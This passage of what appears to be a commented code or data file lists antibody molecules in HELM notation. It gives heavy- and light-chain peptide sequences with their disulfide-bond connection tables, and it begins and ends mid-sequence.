# Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.
# D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.
# Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE3{Q.V.Q.L.V.Q.S.G.A.E.V.K.K.P.G.A.S.V.K.V.
# S.C.K.A.S.G.Y.T.F.T.N.S.W.I.G.W.F.R.Q.A.P.G.Q.G.L.E.W.I.G.D.I.Y.P.G.G.G.Y.
# T.N.Y.N.E.I.F.K.G.K.A.T.M.T.A.D.T.S.T.N.T.A.Y.M.E.L.S.S.L.R.S.E.D.T.A.V.Y.
# Y.C.S.R.G.I.P.G.Y.A.M.D.Y.W.G.Q.G.T.L.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.
# S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.
# H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.
# K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.
# L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.
# V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.
# G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.
# P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.
# N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.
# V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE4{D.I.Q.M.T.Q.R.P.D.S.L.
# S.A.S.V.G.D.R.V.T.M.S.C.K.S.S.Q.S.L.L.N.S.G.D.Q.K.N.Y.L.T.W.Y.Q.Q.K.P.G.Q.
# P.P.K.L.L.I.Y.W.A.S.T.G.E.S.G.V.P.D.R.F.S.G.S.G.S.G.T.D.F.T.F.T.I.S.S.L.Q.
# P.E.D.I.A.T.Y.Y.C.Q.N.D.Y.S.Y.P.W.T.F.G.Q.G.T.K.V.E.I.K.R.T.V.A.A.P.S.V.F.
# I.F.P.P.S.D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.
# L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.
# V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.G.E.C}$PEPTIDE1,PEPTIDE1,140:R3-
# 200:R3|PEPTIDE3,PEPTIDE3,145:R3-201:R3|PEPTIDE2,PEPTIDE2,22:R3-96:R3|PEPTI
# DE2,PEPTIDE3,230:R3-230:R3|PEPTIDE2,PEPTIDE2,262:R3-322:R3|PEPTIDE4,PEPTID
# E4,140:R3-200:R3|PEPTIDE3,PEPTIDE4,221:R3-220:R3|PEPTIDE4,PEPTIDE4,23:R3-9
# 4:R3|PEPTIDE3,PEPTIDE3,22:R3-96:R3|PEPTIDE2,PEPTIDE3,227:R3-227:R3|PEPTIDE
# 3,PEPTIDE3,262:R3-322:R3|PEPTIDE2,PEPTIDE1,221:R3-220:R3|PEPTIDE2,PEPTIDE2
# ,145:R3-201:R3|PEPTIDE1,PEPTIDE1,23:R3-94:R3|PEPTIDE2,PEPTIDE2,368:R3-426:
# R3|PEPTIDE3,PEPTIDE3,368:R3-426:R3$$$' , 'PEPTIDE1{Q.S.V.L.T.Q.P.P.S.A.S.G
# .T.P.G.Q.R.V.T.I.S.C.S.G.S.N.T.N.I.G.K.N.Y.V.S.W.Y.Q.Q.L.P.G.T.A.P.K.L.L.I
# .Y.A.N.S.N.R.P.S.G.V.P.D.R.F.S.G.S.K.S.G.T.S.A.S.L.A.I.S.G.L.R.S.E.D.E.A.D
# .Y.Y.C.A.S.W.D.A.S.L.N.G.W.V.F.G.G.G.T.K.L.T.V.L.G.Q.P.K.A.A.P.S.V.T.L.F.P
# .P.S.S.E.E.L.Q.A.N.K.A.T.L.V.C.L.I.S.D.F.Y.P.G.A.V.T.V.A.W.K.A.D.S.S.P.V.K
# .A.G.V.E.T.T.T.P.S.K.Q.S.N.N.K.Y.A.A.S.S.Y.L.S.L.T.P.E.Q.W.K.S.H.R.S.Y.S.C
# .Q.V.T.H.E.G.S.T.V.E.K.T.V.A.P.T.E.C.S}|PEPTIDE2{E.V.Q.L.L.E.S.G.G.G.L.V.Q
# .P.G.G.S.L.R.L.S.C.A.A.S.G.F.T.F.S.N.A.W.M.S.W.V.R.Q.A.P.G.K.G.L.E.W.V.S.S
# .I.S.V.G.G.H.R.T.Y.Y.A.D.S.V.K.G.R.S.T.I.S.R.D.N.S.K.N.T.L.Y.L.Q.M.N.S.L.R
# .A.E.D.T.A.V.Y.Y.C.A.R.I.R.V.G.P.S.G.G.A.F.D.Y.W.G.Q.G.T.L.V.T.V.S.S.A.S.T
# .K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S
# .W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G
# .T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A
# .P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H
# .E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V
# .L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q
# .P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V
# .E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R
# .W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE3{E
# .V.Q.L.L.E.S.G.G.G.L.V.Q.P.G.G.S.L.R.L.S.C.A.A.S.G.F.T.F.S.N.A.W.M.S.W.V.R
# .Q.A.P.G.K.G.L.E.W.V.S.S.I.S.V.G.G.H.R.T.Y.Y.A.D.S.V.K.G.R.S.T.I.S.R.D.N.S
# .K.N.T.L.Y.L.Q.M.N.S.L.R.A.E.D.T.A.V.Y.Y.C.A.R.I.R.V.G.P.S.G.G.A.F.D.Y.W.G
# .Q.G.T.L.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L
# .V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L
# .S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.S
# .C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T
# .P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E
# .E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A
# .P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C
# .L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F
# .F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L
# .S.L.S.P.G.K}|PEPTIDE4{Q.S.V.L.T.Q.P.P.S.A.S.G.T.P.G.Q.R.V.T.I.S.C.S.G.S.N
# .T.N.I.G.K.N.Y.V.S.W.Y.Q.Q.L.P.G.T.A.P.K.L.L.I.Y.A.N.S.N.R.P.S.G.V.P.D.R.F
# .S.G.S.K.S.G.T.S.A.S.L.A.I.S.G.L.R.S.E.D.E.A.D.Y.Y.C.A.S.W.D.A.S.L.N.G.W.V
# .F.G.G.G.T.K.L.T.V.L.G.Q.P.K.A.A.P.S.V.T.L.F.P.P.S.S.E.E.L.Q.A.N.K.A.T.L.V
# .C.L.I.S.D.F.Y.P.G.A.V.T.V.A.W.K.A.D.S.S.P.V.K.A.G.V.E.T.T.T.P.S.K.Q.S.N.N
# .K.Y.A.A.S.S.Y.L.S.L.T.P.E.Q.W.K.S.H.R.S.Y.S.C.Q.V.T.H.E.G.S.T.V.E.K.T.V.A
# .P.T.E.C.S}$PEPTIDE3,PEPTIDE4,224:R3-215:R3|PEPTIDE3,PEPTIDE3,265:R3-325:R
# 3|PEPTIDE4,PEPTIDE4,22:R3-89:R3|PEPTIDE3,PEPTIDE3,22:R3-96:R3|PEPTIDE2,PEP
# TIDE3,233:R3-233:R3|PEPTIDE1,PEPTIDE1,22:R3-89:R3|PEPTIDE2,PEPTIDE2,22:R3-
# 96:R3|PEPTIDE1,PEPTIDE1,138:R3-197:R3|PEPTIDE2,PEPTIDE2,148:R3-204:R3|PEPT
# IDE4,PEPTIDE4,138:R3-197:R3|PEPTIDE3,PEPTIDE3,148:R3-204:R3|PEPTIDE2,PEPTI
# DE2,265:R3-325:R3|PEPTIDE2,PEPTIDE2,371:R3-429:R3|PEPTIDE3,PEPTIDE3,371:R3
# -429:R3|PEPTIDE2,PEPTIDE1,224:R3-215:R3|PEPTIDE2,PEPTIDE3,230:R3-230:R3$$$
# ' , 'PEPTIDE1{S.S.E.L.T.Q.D.P.A.V.S.V.A.L.G.Q.T.V.R.I.T.C.Q.G.D.S.L.R.S.Y.
# Y.A.S.W.Y.Q.Q.K.P.G.Q.A.P.V.L.V.I.Y.G.K.N.N.R.P.S.G.I.P.D.R.F.S.G.S.S.S.G.
# N.T.A.S.L.T.I.T.G.A.Q.A.E.D.E.A.D.Y.Y.C.N.S.R.D.S.S.G.N.H.V.V.F.G.G.G.T.K.
# L.T.V.L.G.Q.P.K.A.A.P.S.V.T.L.F.P.P.S.S.E.E.L.Q.A.N.K.A.T.L.V.C.L.I.S.D.F.
# Y.P.G.A.V.T.V.A.W.K.A.D.S.S.P.V.K.A.G.V.E.T.T.T.P.S.K.Q.S.N.N.K.Y.A.A.S.S.
# Y.L.S.L.T.P.E.Q.W.K.S.H.R.S.Y.S.C.Q.V.T.H.E.G.S.T.V.E.K.T.V.A.P.T.E.C.S}|P
# EPTIDE2{E.V.Q.L.V.Q.S.G.G.G.V.E.R.P.G.G.S.L.R.L.S.C.A.A.S.G.F.T.F.D.D.Y.G.
# M.S.W.V.R.Q.A.P.G.K.G.L.E.W.V.S.G.I.N.W.N.G.G.S.T.G.Y.A.D.S.V.K.G.R.V.T.I.
# S.R.D.N.A.K.N.S.L.Y.L.Q.M.N.S.L.R.A.E.D.T.A.V.Y.Y.C.A.K.I.L.G.A.G.R.G.W.Y.
# F.D.L.W.G.K.G.T.T.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.
# A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.
# G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.R.
# V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.
# M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.
# T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.
# K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.E.E.M.T.K.N.Q.
# V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.
# S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.
# T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE3{E.V.Q.L.V.Q.S.G.G.G.V.E.R.P.G.G.S.L.R.L.S.
# C.A.A.S.G.F.T.F.D.D.Y.G.M.S.W.V.R.Q.A.P.G.K.G.L.E.W.V.S.G.I.N.W.N.G.G.S.T.
# G.Y.A.D.S.V.K.G.R.V.T.I.S.R.D.N.A.K.N.S.L.Y.L.Q.M.N.S.L.R.A.E.D.T.A.V.Y.Y.
# C.A.K.I.L.G.A.G.R.G.W.Y.F.D.L.W.G.K.G.T.T.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.
# A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.
# G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.
# N.H.K.P.S.N.T.K.V.D.K.R.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.
# V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.
# W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.
# L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.
# L.P.P.S.R.E.E.M.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.
# E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.
# C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE4{S.S.E.L.T.Q.D.P.A.
# V.S.V.A.L.G.Q.T.V.R.I.T.C.Q.G.D.S.L.R.S.Y.Y.A.S.W.Y.Q.Q.K.P.G.Q.A.P.V.L.V.
# I.Y.G.K.N.N.R.P.S.G.I.P.D.R.F.S.G.S.S.S.G.N.T.A.S.L.T.I.T.G.A.Q.A.E.D.E.A.
# D.Y.Y.C.N.S.R.D.S.S.G.N.H.V.V.F.G.G.G.T.K.L.T.V.L.G.Q.P.K.A.A.P.S.V.T.L.F.
# P.P.S.S.E.E.L.Q.A.N.K.A.T.L.V.C.L.I.S.D.F.Y.P.G.A.V.T.V.A.W.K.A.D.S.S.P.V.
# K.A.G.V.E.T.T.T.P.S.K.Q.S.N.N.K.Y.A.A.S.S.Y.L.S.L.T.P.E.Q.W.K.S.H.R.S.Y.S.
# C.Q.V.T.H.E.G.S.T.V.E.K.T.V.A.P.T.E.C.S}$PEPTIDE4,PEPTIDE4,22:R3-87:R3|PEP
# TIDE3,PEPTIDE3,148:R3-204:R3|PEPTIDE2,PEPTIDE3,230:R3-230:R3|PEPTIDE2,PEPT
# IDE2,148:R3-204:R3|PEPTIDE4,PEPTIDE4,136:R3-195:R3|PEPTIDE3,PEPTIDE4,224:R
# 3-213:R3|PEPTIDE2,PEPTIDE2,22:R3-96:R3|PEPTIDE1,PEPTIDE1,22:R3-87:R3|PEPTI
# DE3,PEPTIDE3,265:R3-325:R3|PEPTIDE2,PEPTIDE1,224:R3-213:R3|PEPTIDE3,PEPTID
# E3,22:R3-96:R3|PEPTIDE2,PEPTIDE2,371:R3-429:R3|PEPTIDE1,PEPTIDE1,136:R3-19
# 5:R3|PEPTIDE2,PEPTIDE2,265:R3-325:R3|PEPTIDE3,PEPTIDE3,371:R3-429:R3|PEPTI
# DE2,PEPTIDE3,233:R3-233:R3$$$' , 'PEPTIDE1{S.S.E.L.T.Q.D.P.A.V.S.V.A.L.G.Q
# .T.V.R.I.T.C.Q.G.D.S.L.R.S.Y.Y.A.T.W.Y.Q.Q.K.P.G.Q.A.P.I.L.V.I.Y.G.E.N.K.R
# .P.S.G.I.P.D.R.F.S.G.S.S.S.G.N.T.A.S.L.T.I.T.G.A.Q.A.E.D.E.A.D.Y.Y.C.K.S.R
# .D.G.S.G.Q.H.L.V.F.G.G.G.T.K.L.T.V.L.G.Q.P.K.A.A.P.S.V.T.L.F.P.P.S.S.E.E.L
# .Q.A.N.K.A.T.L.V.C.L.I.S.D.F.Y.P.G.A.V.T.V.A.W.K.A.D.S.S.P.V.K.A.G.V.E.T.T
# .T.P.S.K.Q.S.N.N.K.Y.A.A.S.S.Y.L.S.L.T.P.E.Q.W.K.S.H.R.S.Y.S.C.Q.V.T.H.E.G
# .S.T.V.E.K.T.V.A.P.A.E.C.S}|PEPTIDE2{E.V.Q.L.V.Q.S.G.A.E.V.K.K.P.G.S.S.V.K
# .V.S.C.K.A.S.G.G.T.F.S.S.Y.A.I.S.W.V.R.Q.A.P.G.Q.G.L.E.W.M.G.G.I.I.P.I.F.G
# .T.A.N.Y.A.Q.K.F.Q.G.R.V.T.I.T.A.D.K.S.T.S.T.A.Y.M.E.L.S.S.L.R.S.E.D.T.A.V
# .Y.Y.C.A.R.A.P.L.R.F.L.E.W.S.T.Q.D.H.Y.Y.Y.Y.Y.M.D.V.W.G.K.G.T.T.V.T.V.S.S
# .A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V
# .T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S
# .S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P
# .C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D
# .V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V
# .V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A
# .K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.E.E.M.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D
# .I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D
# .K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPT
# IDE3{E.V.Q.L.V.Q.S.G.A.E.V.K.K.P.G.S.S.V.K.V.S.C.K.A.S.G.G.T.F.S.S.Y.A.I.S
# .W.V.R.Q.A.P.G.Q.G.L.E.W.M.G.G.I.I.P.I.F.G.T.A.N.Y.A.Q.K.F.Q.G.R.V.T.I.T.A
# .D.K.S.T.S.T.A.Y.M.E.L.S.S.L.R.S.E.D.T.A.V.Y.Y.C.A.R.A.P.L.R.F.L.E.W.S.T.Q
# .D.H.Y.Y.Y.Y.Y.M.D.V.W.G.K.G.T.T.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K
# .S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F
# .P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S
# .N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P
# .P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G
# .V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E
# .Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R
# .E.E.M.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K
# .T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H
# .E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE4{S.S.E.L.T.Q.D.P.A.V.S.V.A.L
# .G.Q.T.V.R.I.T.C.Q.G.D.S.L.R.S.Y.Y.A.T.W.Y.Q.Q.K.P.G.Q.A.P.I.L.V.I.Y.G.E.N
# .K.R.P.S.G.I.P.D.R.F.S.G.S.S.S.G.N.T.A.S.L.T.I.T.G.A.Q.A.E.D.E.A.D.Y.Y.C.K
# .S.R.D.G.S.G.Q.H.L.V.F.G.G.G.T.K.L.T.V.L.G.Q.P.K.A.A.P.S.V.T.L.F.P.P.S.S.E
# .E.L.Q.A.N.K.A.T.L.V.C.L.I.S.D.F.Y.P.G.A.V.T.V.A.W.K.A.D.S.S.P.V.K.A.G.V.E
# .T.T.T.P.S.K.Q.S.N.N.K.Y.A.A.S.S.Y.L.S.L.T.P.E.Q.W.K.S.H.R.S.Y.S.C.Q.V.T.H
# .E.G.S.T.V.E.K.T.V.A.P.A.E.C.S}$PEPTIDE2,PEPTIDE1,233:R3-213:R3|PEPTIDE3,P
# EPTIDE3,157:R3-213:R3|PEPTIDE2,PEPTIDE2,380:R3-438:R3|PEPTIDE2,PEPTIDE3,23
# 9:R3-239:R3|PEPTIDE3,PEPTIDE3,22:R3-96:R3|PEPTIDE4,PEPTIDE4,136:R3-195:R3|
# PEPTIDE2,PEPTIDE3,242:R3-242:R3|PEPTIDE3,PEPTIDE3,380:R3-438:R3|PEPTIDE2,P
# EPTIDE2,22:R3-96:R3|PEPTIDE1,PEPTIDE1,136:R3-195:R3|PEPTIDE3,PEPTIDE4,233:
# R3-213:R3|PEPTIDE2,PEPTIDE2,157:R3-213:R3|PEPTIDE3,PEPTIDE3,274:R3-334:R3|
# PEPTIDE1,PEPTIDE1,22:R3-87:R3|PEPTIDE2,PEPTIDE2,274:R3-334:R3|PEPTIDE4,PEP
# TIDE4,22:R3-87:R3$$$' , 'PEPTIDE1{D.I.V.M.T.Q.S.Q.R.F.M.S.T.T.V.G.D.R.V.S.
# I.T.C.K.A.S.Q.N.V.V.S.A.V.A.W.Y.Q.Q.K.P.G.Q.S.P.K.L.L.I.Y.S.A.S.N.R.Y.T.G.
# V.P.D.R.F.T.G.S.G.S.G.T.D.F.T.L.T.I.S.N.M.Q.S.E.D.L.A.D.F.F.C.Q.Q.Y.S.N.Y.
# P.W.T.F.G.G.G.T.K.L.E.I.K.R.T.V.A.A.P.S.V.F.I.F.P.P.S.D.E.Q.L.K.S.G.T.A.S.
# V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.
# K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.V.
# T.K.S.F.N.R.G.E.C}|PEPTIDE2{D.V.K.L.V.E.S.G.G.G.L.V.K.L.G.G.S.L.K.L.S.C.A.
# A.S.G.F.T.F.S.N.Y.Y.M.S.W.V.R.Q.T.P.E.K.R.L.E.L.V.A.A.I.N.S.D.G.G.I.T.Y.Y.
# L.D.T.V.K.G.R.F.T.I.S.R.D.N.A.K.N.T.L.Y.L.Q.M.S.S.L.K.S.E.D.T.A.L.F.Y.C.A.
# R.H.R.S.G.Y.F.S.M.D.Y.W.G.Q.G.T.S.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.
# K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.
# F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.
# S.N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.
# P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.
# G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.
# E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.
# R.D.E.L.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.
# K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.
# H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE3{D.V.K.L.V.E.S.G.G.G.L.V.K.
# L.G.G.S.L.K.L.S.C.A.A.S.G.F.T.F.S.N.Y.Y.M.S.W.V.R.Q.T.P.E.K.R.L.E.L.V.A.A.
# I.N.S.D.G.G.I.T.Y.Y.L.D.T.V.K.G.R.F.T.I.S.R.D.N.A.K.N.T.L.Y.L.Q.M.S.S.L.K.
# S.E.D.T.A.L.F.Y.C.A.R.H.R.S.G.Y.F.S.M.D.Y.W.G.Q.G.T.S.V.T.V.S.S.A.S.T.K.G.
# P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.
# S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.
# T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.
# L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.
# P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.
# V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.
# E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.
# E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.
# Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE4{D.I.V.
# M.T.Q.S.Q.R.F.M.S.T.T.V.G.D.R.V.S.I.T.C.K.A.S.Q.N.V.V.S.A.V.A.W.Y.Q.Q.K.P.
# G.Q.S.P.K.L.L.I.Y.S.A.S.N.R.Y.T.G.V.P.D.R.F.T.G.S.G.S.G.T.D.F.T.L.T.I.S.N.
# M.Q.S.E.D.L.A.D.F.F.C.Q.Q.Y.S.N.Y.P.W.T.F.G.G.G.T.K.L.E.I.K.R.T.V.A.A.P.S.
# V.F.I.F.P.P.S.D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.
